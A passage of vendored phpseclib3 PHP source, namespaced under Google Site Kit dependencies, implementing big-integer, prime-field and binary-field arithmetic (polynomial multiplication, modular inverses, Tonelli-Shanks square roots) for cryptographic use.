\strlen($y)) { $length = \strlen($x); } else { $length = \max(\strlen($x), \strlen($y)); $x = \str_pad($x, $length, "\x00", \STR_PAD_LEFT); $y = \str_pad($y, $length, "\x00", \STR_PAD_LEFT); } switch (\true) { case \PHP_INT_SIZE == 8 && $length <= 4: return $length != 4 ? self::subMultiply(\str_pad($x, 4, "\x00", \STR_PAD_LEFT), \str_pad($y, 4, "\x00", \STR_PAD_LEFT)) : self::subMultiply($x, $y); case \PHP_INT_SIZE == 4 || $length > 32: return self::regularPolynomialMultiply($x, $y); } $m = $length >> 1; $x1 = \substr($x, 0, -$m); $x0 = \substr($x, -$m); $y1 = \substr($y, 0, -$m); $y0 = \substr($y, -$m); $z2 = self::polynomialMultiply($x1, $y1); $z0 = self::polynomialMultiply($x0, $y0); $z1 = self::polynomialMultiply(self::subAdd2($x1, $x0), self::subAdd2($y1, $y0)); $z1 = self::subAdd3($z1, $z2, $z0); $xy = self::subAdd3($z2 . \str_repeat("\x00", 2 * $m), $z1 . \str_repeat("\x00", $m), $z0); return \ltrim($xy, "\x00"); } /** * Perform polynomial multiplication on 2x 32-bit numbers, returning * a 64-bit number * * @param string $x * @param string $y * @return string * @link https://www.bearssl.org/constanttime.html#ghash-for-gcm */ private static function subMultiply($x, $y) { $x = \unpack('N', $x)[1]; $y = \unpack('N', $y)[1]; $x0 = $x & 0x11111111; $x1 = $x & 0x22222222; $x2 = $x & 0x44444444; $x3 = $x & 0x88888888; $y0 = $y & 0x11111111; $y1 = $y & 0x22222222; $y2 = $y & 0x44444444; $y3 = $y & 0x88888888; $z0 = $x0 * $y0 ^ $x1 * $y3 ^ $x2 * $y2 ^ $x3 * $y1; $z1 = $x0 * $y1 ^ $x1 * $y0 ^ $x2 * $y3 ^ $x3 * $y2; $z2 = $x0 * $y2 ^ $x1 * $y1 ^ $x2 * $y0 ^ $x3 * $y3; $z3 = $x0 * $y3 ^ $x1 * $y2 ^ $x2 * $y1 ^ $x3 * $y0; $z0 &= 0x1111111111111111; $z1 &= 0x2222222222222222; $z2 &= 0x4444444444444444; $z3 &= -8608480567731124088; // 0x8888888888888888 gets interpreted as a float $z = $z0 | $z1 | $z2 | $z3; return \pack('J', $z); } /** * Adds two numbers * * @param string $x * @param string $y * @return string */ private static function subAdd2($x, $y) { $length = \max(\strlen($x), \strlen($y)); $x = \str_pad($x, $length, "\x00", \STR_PAD_LEFT); $y = \str_pad($y, $length, "\x00", \STR_PAD_LEFT); return $x ^ $y; } /** * Adds three numbers * * @param string $x * @param string $y * @return string */ private static function subAdd3($x, $y, $z) { $length = \max(\strlen($x), \strlen($y), \strlen($z)); $x = \str_pad($x, $length, "\x00", \STR_PAD_LEFT); $y = \str_pad($y, $length, "\x00", \STR_PAD_LEFT); $z = \str_pad($z, $length, "\x00", \STR_PAD_LEFT); return $x ^ $y ^ $z; } /** * Adds two BinaryFieldIntegers. * * @return static */ public function add(self $y) { static::checkInstance($this, $y); $length = \strlen(static::$modulo[$this->instanceID]); $x = \str_pad($this->value, $length, "\x00", \STR_PAD_LEFT); $y = \str_pad($y->value, $length, "\x00", \STR_PAD_LEFT); return new static($this->instanceID, $x ^ $y); } /** * Subtracts two BinaryFieldIntegers. * * @return static */ public function subtract(self $x) { return $this->add($x); } /** * Multiplies two BinaryFieldIntegers. * * @return static */ public function multiply(self $y) { static::checkInstance($this, $y); return new static($this->instanceID, static::polynomialMultiply($this->value, $y->value)); } /** * Returns the modular inverse of a BinaryFieldInteger * * @return static */ public function modInverse() { $remainder0 = static::$modulo[$this->instanceID]; $remainder1 = $this->value; if ($remainder1 == '') { return new static($this->instanceID); } $aux0 = "\x00"; $aux1 = "\x01"; while ($remainder1 != "\x01") { list($q, $r) = static::polynomialDivide($remainder0, $remainder1); $remainder0 = $remainder1; $remainder1 = $r; // the auxiliary in row n is given by the sum of the auxiliary in // row n-2 and the product of the quotient and the auxiliary in row // n-1 $temp = static::polynomialMultiply($aux1, $q); $aux = \str_pad($aux0, \strlen($temp), "\x00", \STR_PAD_LEFT) ^ \str_pad($temp, \strlen($aux0), "\x00", \STR_PAD_LEFT); $aux0 = $aux1; $aux1 = $aux; } $temp = new static($this->instanceID); $temp->value = \ltrim($aux1, "\x00"); return $temp; } /** * Divides two PrimeFieldIntegers. * * @return static */ public function divide(self $x) { static::checkInstance($this, $x); $x = $x->modInverse(); return $this->multiply($x); } /** * Negate * * A negative number can be written as 0-12. With modulos, 0 is the same thing as the modulo * so 0-12 is the same thing as modulo-12 * * @return object */ public function negate() { $x = \str_pad($this->value, \strlen(static::$modulo[$this->instanceID]), "\x00", \STR_PAD_LEFT); return new static($this->instanceID, $x ^ static::$modulo[$this->instanceID]); } /** * Returns the modulo * * @return string */ public static function getModulo($instanceID) { return static::$modulo[$instanceID]; } /** * Converts an Integer to a byte string (eg. base-256). * * @return string */ public function toBytes() { return \str_pad($this->value, \strlen(static::$modulo[$this->instanceID]), "\x00", \STR_PAD_LEFT); } /** * Converts an Integer to a hex string (eg. base-16). * * @return string */ public function toHex() { return \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::bin2hex($this->toBytes()); } /** * Converts an Integer to a bit string (eg. base-2). * * @return string */ public function toBits() { //return str_pad(BinaryField::base256ToBase2($this->value), strlen(static::$modulo[$this->instanceID]), '0', STR_PAD_LEFT); return \Google\Site_Kit_Dependencies\phpseclib3\Math\BinaryField::base256ToBase2($this->value); } /** * Converts an Integer to a BigInteger * * @return string */ public function toBigInteger() { return new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($this->value, 256); } /** * __toString() magic method * */ public function __toString() { return (string) $this->toBigInteger(); } /** * __debugInfo() magic method * */ public function __debugInfo() { return ['value' => $this->toHex()]; } } <?php /** * Pure-PHP arbitrary precision integer arithmetic library. * * Supports base-2, base-10, base-16, and base-256 numbers. Uses the GMP or BCMath extensions, if available, * and an internal implementation, otherwise. * * PHP version 5 and 7 * * Here's an example of how to use this library: * <code> * <?php * $a = new \phpseclib3\Math\BigInteger(2); * $b = new \phpseclib3\Math\BigInteger(3); * * $c = $a->add($b); * * echo $c->toString(); // outputs 5 * ?> * </code> * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License */ namespace Google\Site_Kit_Dependencies\phpseclib3\Math; use Google\Site_Kit_Dependencies\phpseclib3\Exception\BadConfigurationException; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\Engine; /** * Pure-PHP arbitrary precision integer arithmetic library. Supports base-2, base-10, base-16, and base-256 * numbers. * * @author Jim Wigginton <terrafrost@php.net> */ class BigInteger implements \JsonSerializable { /** * Main Engine * * @var class-string<Engine> */ private static $mainEngine; /** * Selected Engines * * @var list<string> */ private static $engines; /** * The actual BigInteger object * * @var object */ private $value; /** * Mode independent value used for serialization. * * @see self::__sleep() * @see self::__wakeup() * @var string */ private $hex; /** * Precision (used only for serialization) * * @see self::__sleep() * @see self::__wakeup() * @var int */ private $precision; /** * Sets engine type. * * Throws an exception if the type is invalid * * @param string $main * @param list<string> $modexps optional * @return void */ public static function setEngine($main, array $modexps = ['DefaultEngine']) { self::$engines = []; $fqmain = '\\Google\\Site_Kit_Dependencies\\phpseclib3\\Math\\BigInteger\\Engines\\' . $main; if (!\class_exists($fqmain) || !\method_exists($fqmain, 'isValidEngine')) { throw new \InvalidArgumentException("{$main} is not a valid engine"); } if (!$fqmain::isValidEngine()) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\BadConfigurationException("{$main} is not setup correctly on this system"); } /** @var class-string<Engine> $fqmain */ self::$mainEngine = $fqmain; $found = \false; foreach ($modexps as $modexp) { try { $fqmain::setModExpEngine($modexp); $found = \true; break; } catch (\Exception $e) { } } if (!$found) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\BadConfigurationException("No valid modular exponentiation engine found for {$main}"); } self::$engines = [$main, $modexp]; } /** * Returns the engine type * * @return string[] */ public static function getEngine() { self::initialize_static_variables(); return self::$engines; } /** * Initialize static variables */ private static function initialize_static_variables() { if (!isset(self::$mainEngine)) { $engines = [['GMP', ['DefaultEngine']], ['PHP64', ['OpenSSL']], ['BCMath', ['OpenSSL']], ['PHP32', ['OpenSSL']], ['PHP64', ['DefaultEngine']], ['PHP32', ['DefaultEngine']]]; foreach ($engines as $engine) { try { self::setEngine($engine[0], $engine[1]); return; } catch (\Exception $e) { } } throw new \UnexpectedValueException('No valid BigInteger found. This is only possible when JIT is enabled on Windows and neither the GMP or BCMath extensions are available so either disable JIT or install GMP / BCMath'); } } /** * Converts base-2, base-10, base-16, and binary strings (base-256) to BigIntegers. * * If the second parameter - $base - is negative, then it will be assumed that the number's are encoded using * two's compliment. The sole exception to this is -10, which is treated the same as 10 is. * * @param string|int|Engine $x Base-10 number or base-$base number if $base set. * @param int $base */ public function __construct($x = 0, $base = 10) { self::initialize_static_variables(); if ($x instanceof self::$mainEngine) { $this->value = clone $x; } elseif ($x instanceof \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\Engine) { $this->value = new static("{$x}"); $this->value->setPrecision($x->getPrecision()); } else { $this->value = new self::$mainEngine($x, $base); } } /** * Converts a BigInteger to a base-10 number. * * @return string */ public function toString() { return $this->value->toString(); } /** * __toString() magic method */ public function __toString() { return (string) $this->value; } /** * __debugInfo() magic method * * Will be called, automatically, when print_r() or var_dump() are called */ public function __debugInfo() { return $this->value->__debugInfo(); } /** * Converts a BigInteger to a byte string (eg. base-256). * * @param bool $twos_compliment * @return string */ public function toBytes($twos_compliment = \false) { return $this->value->toBytes($twos_compliment); } /** * Converts a BigInteger to a hex string (eg. base-16). * * @param bool $twos_compliment * @return string */ public function toHex($twos_compliment = \false) { return $this->value->toHex($twos_compliment); } /** * Converts a BigInteger to a bit string (eg. base-2). * * Negative numbers are saved as positive numbers, unless $twos_compliment is set to true, at which point, they're * saved as two's compliment. * * @param bool $twos_compliment * @return string */ public function toBits($twos_compliment = \false) { return $this->value->toBits($twos_compliment); } /** * Adds two BigIntegers. * * @param BigInteger $y * @return BigInteger */ public function add(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $y) { return new static($this->value->add($y->value)); } /** * Subtracts two BigIntegers. * * @param BigInteger $y * @return BigInteger */ public function subtract(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $y) { return new static($this->value->subtract($y->value)); } /** * Multiplies two BigIntegers * * @param BigInteger $x * @return BigInteger */ public function multiply(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $x) { return new static($this->value->multiply($x->value)); } /** * Divides two BigIntegers. * * Returns an array whose first element contains the quotient and whose second element contains the * "common residue". If the remainder would be positive, the "common residue" and the remainder are the * same. If the remainder would be negative, the "common residue" is equal to the sum of the remainder * and the divisor (basically, the "common residue" is the first positive modulo). * * Here's an example: * <code> * <?php * $a = new \phpseclib3\Math\BigInteger('10'); * $b = new \phpseclib3\Math\BigInteger('20'); * * list($quotient, $remainder) = $a->divide($b); * * echo $quotient->toString(); // outputs 0 * echo "\r\n"; * echo $remainder->toString(); // outputs 10 * ?> * </code> * * @param BigInteger $y * @return BigInteger[] */ public function divide(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $y) { list($q, $r) = $this->value->divide($y->value); return [new static($q), new static($r)]; } /** * Calculates modular inverses. * * Say you have (30 mod 17 * x mod 17) mod 17 == 1. x can be found using modular inverses. * * @param BigInteger $n * @return BigInteger */ public function modInverse(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $n) { return new static($this->value->modInverse($n->value)); } /** * Calculates modular inverses. * * Say you have (30 mod 17 * x mod 17) mod 17 == 1. x can be found using modular inverses. * * @param BigInteger $n * @return BigInteger[] */ public function extendedGCD(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $n) { \extract($this->value->extendedGCD($n->value)); /** * @var BigInteger $gcd * @var BigInteger $x * @var BigInteger $y */ return ['gcd' => new static($gcd), 'x' => new static($x), 'y' => new static($y)]; } /** * Calculates the greatest common divisor * * Say you have 693 and 609. The GCD is 21. * * @param BigInteger $n * @return BigInteger */ public function gcd(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $n) { return new static($this->value->gcd($n->value)); } /** * Absolute value. * * @return BigInteger */ public function abs() { return new static($this->value->abs()); } /** * Set Precision * * Some bitwise operations give different results depending on the precision being used. Examples include left * shift, not, and rotates. * * @param int $bits */ public function setPrecision($bits) { $this->value->setPrecision($bits); } /** * Get Precision * * Returns the precision if it exists, false if it doesn't * * @return int|bool */ public function getPrecision() { return $this->value->getPrecision(); } /** * Serialize * * Will be called, automatically, when serialize() is called on a BigInteger object. * * __sleep() / __wakeup() have been around since PHP 4.0 * * \Serializable was introduced in PHP 5.1 and deprecated in PHP 8.1: * https://wiki.php.net/rfc/phase_out_serializable * * __serialize() / __unserialize() were introduced in PHP 7.4: * https://wiki.php.net/rfc/custom_object_serialization * * @return array */ public function __sleep() { $this->hex = $this->toHex(\true); $vars = ['hex']; if ($this->getPrecision() > 0) { $vars[] = 'precision'; } return $vars; } /** * Serialize * * Will be called, automatically, when unserialize() is called on a BigInteger object. */ public function __wakeup() { $temp = new static($this->hex, -16); $this->value = $temp->value; if ($this->precision > 0) { // recalculate $this->bitmask $this->setPrecision($this->precision); } } /** * JSON Serialize * * Will be called, automatically, when json_encode() is called on a BigInteger object. * * @return array{hex: string, precision?: int] */ #[\ReturnTypeWillChange] public function jsonSerialize() { $result = ['hex' => $this->toHex(\true)]; if ($this->precision > 0) { $result['precision'] = $this->getPrecision(); } return $result; } /** * Performs modular exponentiation. * * @param BigInteger $e * @param BigInteger $n * @return BigInteger */ public function powMod(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $e, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $n) { return new static($this->value->powMod($e->value, $n->value)); } /** * Performs modular exponentiation. * * @param BigInteger $e * @param BigInteger $n * @return BigInteger */ public function modPow(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $e, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $n) { return new static($this->value->modPow($e->value, $n->value)); } /** * Compares two numbers. * * Although one might think !$x->compare($y) means $x != $y, it, in fact, means the opposite. The reason for this * is demonstrated thusly: * * $x > $y: $x->compare($y) > 0 * $x < $y: $x->compare($y) < 0 * $x == $y: $x->compare($y) == 0 * * Note how the same comparison operator is used. If you want to test for equality, use $x->equals($y). * * {@internal Could return $this->subtract($x), but that's not as fast as what we do do.} * * @param BigInteger $y * @return int in case < 0 if $this is less than $y; > 0 if $this is greater than $y, and 0 if they are equal. * @see self::equals() */ public function compare(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $y) { return $this->value->compare($y->value); } /** * Tests the equality of two numbers. * * If you need to see if one number is greater than or less than another number, use BigInteger::compare() * * @param BigInteger $x * @return bool */ public function equals(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $x) { return $this->value->equals($x->value); } /** * Logical Not * * @return BigInteger */ public function bitwise_not() { return new static($this->value->bitwise_not()); } /** * Logical And * * @param BigInteger $x * @return BigInteger */ public function bitwise_and(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $x) { return new static($this->value->bitwise_and($x->value)); } /** * Logical Or * * @param BigInteger $x * @return BigInteger */ public function bitwise_or(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $x) { return new static($this->value->bitwise_or($x->value)); } /** * Logical Exclusive Or * * @param BigInteger $x * @return BigInteger */ public function bitwise_xor(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $x) { return new static($this->value->bitwise_xor($x->value)); } /** * Logical Right Shift * * Shifts BigInteger's by $shift bits, effectively dividing by 2**$shift. * * @param int $shift * @return BigInteger */ public function bitwise_rightShift($shift) { return new static($this->value->bitwise_rightShift($shift)); } /** * Logical Left Shift * * Shifts BigInteger's by $shift bits, effectively multiplying by 2**$shift. * * @param int $shift * @return BigInteger */ public function bitwise_leftShift($shift) { return new static($this->value->bitwise_leftShift($shift)); } /** * Logical Left Rotate * * Instead of the top x bits being dropped they're appended to the shifted bit string. * * @param int $shift * @return BigInteger */ public function bitwise_leftRotate($shift) { return new static($this->value->bitwise_leftRotate($shift)); } /** * Logical Right Rotate * * Instead of the bottom x bits being dropped they're prepended to the shifted bit string. * * @param int $shift * @return BigInteger */ public function bitwise_rightRotate($shift) { return new static($this->value->bitwise_rightRotate($shift)); } /** * Returns the smallest and largest n-bit number * * @param int $bits * @return BigInteger[] */ public static function minMaxBits($bits) { self::initialize_static_variables(); $class = self::$mainEngine; \extract($class::minMaxBits($bits)); /** @var BigInteger $min * @var BigInteger $max */ return ['min' => new static($min), 'max' => new static($max)]; } /** * Return the size of a BigInteger in bits * * @return int */ public function getLength() { return $this->value->getLength(); } /** * Return the size of a BigInteger in bytes * * @return int */ public function getLengthInBytes() { return $this->value->getLengthInBytes(); } /** * Generates a random number of a certain size * * Bit length is equal to $size * * @param int $size * @return BigInteger */ public static function random($size) { self::initialize_static_variables(); $class = self::$mainEngine; return new static($class::random($size)); } /** * Generates a random prime number of a certain size * * Bit length is equal to $size * * @param int $size * @return BigInteger */ public static function randomPrime($size) { self::initialize_static_variables(); $class = self::$mainEngine; return new static($class::randomPrime($size)); } /** * Generate a random prime number between a range * * If there's not a prime within the given range, false will be returned. * * @param BigInteger $min * @param BigInteger $max * @return false|BigInteger */ public static function randomRangePrime(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $min, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $max) { $class = self::$mainEngine; return new static($class::randomRangePrime($min->value, $max->value)); } /** * Generate a random number between a range * * Returns a random number between $min and $max where $min and $max * can be defined using one of the two methods: * * BigInteger::randomRange($min, $max) * BigInteger::randomRange($max, $min) * * @param BigInteger $min * @param BigInteger $max * @return BigInteger */ public static function randomRange(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $min, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $max) { $class = self::$mainEngine; return new static($class::randomRange($min->value, $max->value)); } /** * Checks a numer to see if it's prime * * Assuming the $t parameter is not set, this function has an error rate of 2**-80. The main motivation for the * $t parameter is distributability. BigInteger::randomPrime() can be distributed across multiple pageloads * on a website instead of just one. * * @param int|bool $t * @return bool */ public function isPrime($t = \false) { return $this->value->isPrime($t); } /** * Calculates the nth root of a biginteger. * * Returns the nth root of a positive biginteger, where n defaults to 2 * * @param int $n optional * @return BigInteger */ public function root($n = 2) { return new static($this->value->root($n)); } /** * Performs exponentiation. * * @param BigInteger $n * @return BigInteger */ public function pow(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $n) { return new static($this->value->pow($n->value)); } /** * Return the minimum BigInteger between an arbitrary number of BigIntegers. * * @param BigInteger ...$nums * @return BigInteger */ public static function min(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger ...$nums) { $class = self::$mainEngine; $nums = \array_map(function ($num) { return $num->value; }, $nums); return new static($class::min(...$nums)); } /** * Return the maximum BigInteger between an arbitrary number of BigIntegers. * * @param BigInteger ...$nums * @return BigInteger */ public static function max(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger ...$nums) { $class = self::$mainEngine; $nums = \array_map(function ($num) { return $num->value; }, $nums); return new static($class::max(...$nums)); } /** * Tests BigInteger to see if it is between two integers, inclusive * * @param BigInteger $min * @param BigInteger $max * @return bool */ public function between(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $min, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $max) { return $this->value->between($min->value, $max->value); } /** * Clone */ public function __clone() { $this->value = clone $this->value; } /** * Is Odd? * * @return bool */ public function isOdd() { return $this->value->isOdd(); } /** * Tests if a bit is set * * @param int $x * @return bool */ public function testBit($x) { return $this->value->testBit($x); } /** * Is Negative? * * @return bool */ public function isNegative() { return $this->value->isNegative(); } /** * Negate * * Given $k, returns -$k * * @return BigInteger */ public function negate() { return new static($this->value->negate()); } /** * Scan for 1 and right shift by that amount * * ie. $s = gmp_scan1($n, 0) and $r = gmp_div_q($n, gmp_pow(gmp_init('2'), $s)); * * @param BigInteger $r * @return int */ public static function scan1divide(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $r) { $class = self::$mainEngine; return $class::scan1divide($r->value); } /** * Create Recurring Modulo Function * * Sometimes it may be desirable to do repeated modulos with the same number outside of * modular exponentiation * * @return callable */ public function createRecurringModuloFunction() { $func = $this->value->createRecurringModuloFunction(); return function (\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $x) use($func) { return new static($func($x->value)); }; } /** * Bitwise Split * * Splits BigInteger's into chunks of $split bits * * @param int $split * @return BigInteger[] */ public function bitwise_split($split) { return \array_map(function ($val) { return new static($val); }, $this->value->bitwise_split($split)); } } <?php /** * Prime Finite Fields * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License */ namespace Google\Site_Kit_Dependencies\phpseclib3\Math\PrimeField; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; use Google\Site_Kit_Dependencies\phpseclib3\Math\Common\FiniteField\Integer as Base; /** * Prime Finite Fields * * @author Jim Wigginton <terrafrost@php.net> */ class Integer extends \Google\Site_Kit_Dependencies\phpseclib3\Math\Common\FiniteField\Integer { /** * Holds the PrimeField's value * * @var BigInteger */ protected $value; /** * Keeps track of current instance * * @var int */ protected $instanceID; /** * Holds the PrimeField's modulo * * @var array<int, BigInteger> */ protected static $modulo; /** * Holds a pre-generated function to perform modulo reductions * * @var array<int, callable(BigInteger):BigInteger> */ protected static $reduce; /** * Zero * * @var BigInteger */ protected static $zero; /** * Default constructor * * @param int $instanceID * @param BigInteger $num */ public function __construct($instanceID, $num = null) { $this->instanceID = $instanceID; if (!isset($num)) { $this->value = clone static::$zero[static::class]; } else { $reduce = static::$reduce[$instanceID]; $this->value = $reduce($num); } } /** * Set the modulo for a given instance * * @param int $instanceID * @return void */ public static function setModulo($instanceID, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $modulo) { static::$modulo[$instanceID] = $modulo; } /** * Set the modulo for a given instance * * @param int $instanceID * @return void */ public static function setRecurringModuloFunction($instanceID, callable $function) { static::$reduce[$instanceID] = $function; if (!isset(static::$zero[static::class])) { static::$zero[static::class] = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(); } } /** * Delete the modulo for a given instance */ public static function cleanupCache($instanceID) { unset(static::$modulo[$instanceID]); unset(static::$reduce[$instanceID]); } /** * Returns the modulo * * @param int $instanceID * @return BigInteger */ public static function getModulo($instanceID) { return static::$modulo[$instanceID]; } /** * Tests a parameter to see if it's of the right instance * * Throws an exception if the incorrect class is being utilized * * @return void */ public static function checkInstance(self $x, self $y) { if ($x->instanceID != $y->instanceID) { throw new \UnexpectedValueException('The instances of the two PrimeField\\Integer objects do not match'); } } /** * Tests the equality of two numbers. * * @return bool */ public function equals(self $x) { static::checkInstance($this, $x); return $this->value->equals($x->value); } /** * Compares two numbers. * * @return int */ public function compare(self $x) { static::checkInstance($this, $x); return $this->value->compare($x->value); } /** * Adds two PrimeFieldIntegers. * * @return static */ public function add(self $x) { static::checkInstance($this, $x); $temp = new static($this->instanceID); $temp->value = $this->value->add($x->value); if ($temp->value->compare(static::$modulo[$this->instanceID]) >= 0) { $temp->value = $temp->value->subtract(static::$modulo[$this->instanceID]); } return $temp; } /** * Subtracts two PrimeFieldIntegers. * * @return static */ public function subtract(self $x) { static::checkInstance($this, $x); $temp = new static($this->instanceID); $temp->value = $this->value->subtract($x->value); if ($temp->value->isNegative()) { $temp->value = $temp->value->add(static::$modulo[$this->instanceID]); } return $temp; } /** * Multiplies two PrimeFieldIntegers. * * @return static */ public function multiply(self $x) { static::checkInstance($this, $x); return new static($this->instanceID, $this->value->multiply($x->value)); } /** * Divides two PrimeFieldIntegers. * * @return static */ public function divide(self $x) { static::checkInstance($this, $x); $denominator = $x->value->modInverse(static::$modulo[$this->instanceID]); return new static($this->instanceID, $this->value->multiply($denominator)); } /** * Performs power operation on a PrimeFieldInteger. * * @return static */ public function pow(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $x) { $temp = new static($this->instanceID); $temp->value = $this->value->powMod($x, static::$modulo[$this->instanceID]); return $temp; } /** * Calculates the square root * * @link https://en.wikipedia.org/wiki/Tonelli%E2%80%93Shanks_algorithm * @return static|false */ public function squareRoot() { static $one, $two; if (!isset($one)) { $one = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(1); $two = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(2); } $reduce = static::$reduce[$this->instanceID]; $p_1 = static::$modulo[$this->instanceID]->subtract($one); $q = clone $p_1; $s = \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger::scan1divide($q); list($pow) = $p_1->divide($two); for ($z = $one; !$z->equals(static::$modulo[$this->instanceID]); $z = $z->add($one)) { $temp = $z->powMod($pow, static::$modulo[$this->instanceID]); if ($temp->equals($p_1)) { break; } } $m = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($s); $c = $z->powMod($q, static::$modulo[$this->instanceID]); $t = $this->value->powMod($q, static::$modulo[$this->instanceID]); list($temp) = $q->add($one)->divide($two); $r = $this->value->powMod($temp, static::$modulo[$this->instanceID]); while (!$t->equals($one)) { for ($i = clone $one; $i->compare($m) < 0; $i = $i->add($one)) { if ($t->powMod($two->pow($i), static::$modulo[$this->instanceID])->equals($one)) { break; } } if ($i->compare($m) == 0) { return \false; } $b = $c->powMod($two->pow($m->subtract($i)->subtract($one)), static::$modulo[$this->instanceID]); $m = $i; $c = $reduce($b->multiply($b)); $t = $reduce($t->multiply($c)); $r = $reduce($r->multiply($b)); } return new static($this->instanceID, $r); } /** * Is Odd? * * @return bool */ public function isOdd() { return $this->value->isOdd(); } /** * Negate * * A negative number can be written as 0-12. With modulos, 0 is the same thing as the modulo * so 0-12 is the same thing as modulo-12 * * @return static */ public function negate() { return new static($this->instanceID, static::$modulo[$this->instanceID]->subtract($this->value)); } /** * Converts an Integer to a byte string (eg. base-256). * * @return string */ public function toBytes() { if (isset(static::$modulo[$this->instanceID])) { $length = static::$modulo[$this->instanceID]->getLengthInBytes(); return \str_pad($this->value->toBytes(), $length, "\x00", \STR_PAD_LEFT); } return $this->value->toBytes(); } /** * Converts an Integer to a hex string (eg. base-16). * * @return string */ public function toHex() { return \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::bin2hex($this->toBytes()); } /** * Converts an Integer to a bit string (eg. base-2). * * @return string */ public function toBits() { // return $this->value->toBits(); static $length; if (!isset($length)) { $length = static::$modulo[$this->instanceID]->getLength(); } return \str_pad($this->value->toBits(), $length, '0', \STR_PAD_LEFT); } /** * Returns the w-ary non-adjacent form (wNAF) * * @param int $w optional * @return array<int, int> */ public function getNAF($w = 1) { $w++; $mask = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger((1 << $w) - 1); $sub = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(1 << $w); //$sub = new BigInteger(1 << ($w - 1)); $d = $this->toBigInteger(); $d_i = []; $i = 0; while ($d->compare(static::$zero[static::class]) > 0) { if ($d->isOdd()) { // start mods $bigInteger = $d->testBit($w - 1) ? $d->bitwise_and($mask)->subtract($sub) : $d->bitwise_and($mask); // end mods $d = $d->subtract($bigInteger); $d_i[$i] = (int) $bigInteger->toString(); } else { $d_i[$i] = 0; } $shift = !$d->equals(static::$zero[static::class]) && $d->bitwise_and($mask)->equals(static::$zero[static::class]) ? $w : 1; // $w or $w + 1? $d = $d->bitwise_rightShift($shift); while (--$shift > 0) { $d_i[++$i] = 0; } $i++; } return $d_i; } /** * Converts an Integer to a BigInteger * * @return BigInteger */ public function toBigInteger() { return clone $this->value; } /** * __toString() magic method * * @return string */ public function __toString() { return (string) $this->value; } /** * __debugInfo() magic method * * @return array */ public function __debugInfo() { return ['value' => $this->toHex()]; } } <?php /** * Binary Finite Fields * * Utilizes the factory design pattern * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License */ namespace Google\Site_Kit_Dependencies\phpseclib3\Math; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Math\BinaryField\Integer; use Google\Site_Kit_Dependencies\phpseclib3\Math\Common\FiniteField; /** * Binary Finite Fields * * @author Jim Wigginton <terrafrost@php.net> */ class BinaryField extends \Google\Site_Kit_Dependencies\phpseclib3\Math\Common\FiniteField { /** * Instance Counter * * @var int */ private static $instanceCounter = 0; /** * Keeps track of current instance * * @var int */ protected $instanceID; /** @var BigInteger */ private $randomMax; /** * Default constructor */ public function __construct(...$indices) { $m = \array_shift($indices); if ($m > 571) { /* sect571r1 and sect571k1 are the largest binary curves that https://www.secg.org/sec2-v2.pdf defines altho theoretically there may be legit reasons to use binary finite fields with larger degrees imposing a limit on the maximum size is both reasonable and precedented. in particular, http://tools.ietf.org/html/rfc4253#section-6.1 (The Secure Shell (SSH) Transport Layer Protocol) says "implementations SHOULD check that the packet length is reasonable in order for the implementation to avoid denial of service and/or buffer overflow attacks" */ throw new \OutOfBoundsException('Degrees larger than 571 are not supported'); } $val = \str_repeat('0', $m) . '1'; foreach ($indices as $index) { $val[$index] = '1'; } $modulo = static::base2ToBase256(\strrev($val)); $mStart = 2 * $m - 2; $t = \ceil($m / 8); 